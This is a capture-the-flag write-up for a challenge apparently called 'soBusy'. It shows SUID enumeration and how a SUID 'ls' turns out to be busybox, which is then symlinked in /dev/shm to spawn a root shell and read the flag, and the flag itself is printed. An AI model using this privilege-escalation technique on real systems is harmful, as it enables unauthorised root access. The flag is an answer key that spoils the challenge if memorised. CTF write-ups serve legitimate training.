😅 soBusy

👀 Before you start

You can donate to me via Buy Me a Coffee or follow me on Github

🚩 Getting the Flag

We find ourselves on a VM, aware that we are in a Docker because there is a .dockerenv file at the root of the system.

As with any good VM we land on, we perform basic commands to understand what we can do.

Normally, we run a linpeas.sh to get a full report of the machine. However, we do not have write permission in the /tmp/ directory, and we cannot execute files we have created.

gcc2024@soBusy:~$ find / -perm /4000 2>/dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/ls
/usr/bin/passwd

It's quite odd to see that we have /usr/bin/ls with SUID. So, we try to execute it to see if we can do something with it.

gcc2024@soBusy:~$ /usr/bin/ls -la /root
total 12
drwx------  2 root root 4096 Jan 22 12:51 .
drwxr-xr-x 19 root root 4096 Jan 22 12:51 ..
-rw-r--r--  1 root root   33 Jan 10  2024 flag.txt

Indeed, our ls has SUID, so we can execute commands as root but only with our ls.

However, ls does not allow us to read files or execute them...

After some thought, I decide to perform an ls on the file /usr/bin/ls to see if I have a genuine ls binary or a malicious one.

gcc2024@soBusy:~$ /usr/bin/ls -la /usr/bin/ls
-rwsr-xr-x 1 root root 188584 Jan 10  2024 /usr/bin/ls

As I suspected, we should not trust our first impression; we have an ls binary that is SUID. But it's not a real ls because a genuine ls binary should have this size:

MisTraleuh@/$ ls -la /bin/ls
-rwsr-sr-x 1 root root 138216 Jan  8 15:56 /usr/bin/ls

By executing a help argument with ls, we encounter a surprising result:`

gcc2024@soBusy:~$ /usr/bin/ls --help
Usage: ls [OPTION]... [FILE]...
Usage: busybox [function [arguments]...] 
   or: busybox --list
      link to busybox for each function they wish to use and BusyBox
[...]

Thus, we have an ls binary that is also a busybox binary. Therefore, we can execute commands with this ls binary, which is in reality a busybox binary.

As mentioned earlier, even if the /tmp/ directory is not writable, the /dev/shm directory is. So, we can execute commands in this directory.

gcc2024@soBusy:~$ cd /dev/shm
gcc2024@sobusy:/dev/shm$ ln -s /usr/bin/ls busybox
gcc2024@sobusy:/dev/shm$ ./busybox /bin/sh
root# id
uid=0(root) gid=0(root) groups=0(root)
root# cat /root/flag.txt
GCC{BusyBox_H4s_M0r3_Opti0ns_Th4n_LS}